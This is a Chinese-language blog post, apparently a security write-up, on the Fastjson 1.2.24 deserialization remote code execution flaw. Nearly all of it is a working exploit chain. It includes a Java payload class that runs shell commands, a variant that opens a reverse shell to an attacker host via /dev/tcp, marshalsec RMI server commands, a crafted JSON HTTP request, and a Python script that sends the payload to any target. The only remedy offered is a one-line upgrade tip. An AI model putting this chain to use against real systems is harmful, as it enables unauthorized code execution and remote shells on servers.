简介
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。
Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。
poc
//FileName:Exploit.java
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
public class Exploit{
public Exploit() throws Exception {
Process p = Runtime.getRuntime().exec(new String[]{"bash", "-c", "touch /tmp/exphub"});
InputStream is = p.getInputStream();
BufferedReader reader = new BufferedReader(new InputStreamReader(is));
String line;
while((line = reader.readLine()) != null) {
System.out.println(line);
}
p.waitFor();
is.close();
reader.close();
p.destroy();
}
public static void main(String[] args) throws Exception {
}
}
编译成class的文件上传到vps。
javac Exploit.java
通过python3 启动http服务,将poc移至改目录。
python3 -m http.server 8888
开启远程加载类服务,可以通过Jrmp服务或者Ldap服务加载远程类文件
JRMP服务
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://vps:8888/#Exploit" 9999
构造数据包加载远程类
POST / HTTP/1.1
Host: your-ip:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 160
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://vps:9999/TouchFile",
"autoCommit":true
}
}
文件被创建,命令执行成功
反弹shell
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
public class Exploit{
public Exploit() throws Exception {
Process p = Runtime.getRuntime().exec(new String[]{"bash", "-c", "bash -i >& /dev/tcp/vps/55555 0>&1"});
InputStream is = p.getInputStream();
BufferedReader reader = new BufferedReader(new InputStreamReader(is));
String line;
while((line = reader.readLine()) != null) {
System.out.println(line);
}
p.waitFor();
is.close();
reader.close();
p.destroy();
}
public static void main(String[] args) throws Exception {
}
}
工具附件
脚本检测:
#FileName:fastjson-1.2.24_rce.py
import sys
import requests
if len(sys.argv)!=3:
print('+------------------------------------------------------------------------------------+')
print('+ RMIServer: rmi://ip:port/exp +')
print('+ LDAPServer: ldap://ip:port/exp +')
print('+------------------------------------------------------------------------------------+')
print('+ USE: python3 <filename> <target-ip> <RMI/LDAPServer> +')
print('+ EXP: python3 fastjson-1.2.24_rce.py http://1.1.1.1:8080/ ldap://2.2.2.2:88/Object +')
print('+ VER: fastjson<=1.2.24 +')
print('+------------------------------------------------------------------------------------+')
sys.exit()
url = sys.argv[1]
server = sys.argv[2]
headers = {
'Host': "127.0.0.1",
'Content-Type': "application/json",
'Accept-Encoding': "gzip, deflate",
'Connection': "close",
'Accept': "*/*",
'User-Agent': "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"
}
payload = '''
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"%s",
"autoCommit":true
}
}
''' %server
try:
r = requests.post(url, payload, headers=headers, timeout=10)
print ("[+] RMI/LDAP Send Success ")
except:
print ("[-] RMI/LDAP Send Failed ")
python fastjson-1.2.24_rce.py
修复建议
升级fastjson到最新版本
本文由博客群发一文多发等运营工具平台 OpenWrite 发布